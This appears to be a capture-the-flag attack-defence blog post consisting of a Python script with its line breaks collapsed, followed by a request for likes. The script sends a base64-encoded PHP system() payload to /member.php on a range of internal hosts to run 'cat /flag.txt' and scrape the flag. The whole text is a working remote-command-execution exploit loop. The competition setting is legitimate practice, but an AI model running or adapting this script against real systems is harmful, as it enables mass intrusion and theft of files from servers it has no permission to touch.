import requests, re, base64weba_hosts = ["http://172.20.%s.103" % x for x in range(101,147)]s = requests.session()payload = base64.b64encode(b'system("cat /flag.txt");')params = {"hello": payload}for web_a in weba_hosts:try:resp = requests.get(url=web_a,timeout=1)resp = s.get(web_a+"/member.php",params=params)rs = re.search(r"\w{32}",resp.text)print(web_a)print(rs.group())except:print(web_a)print("IP无法访问")
若有收获,就点个赞吧
0 人点赞
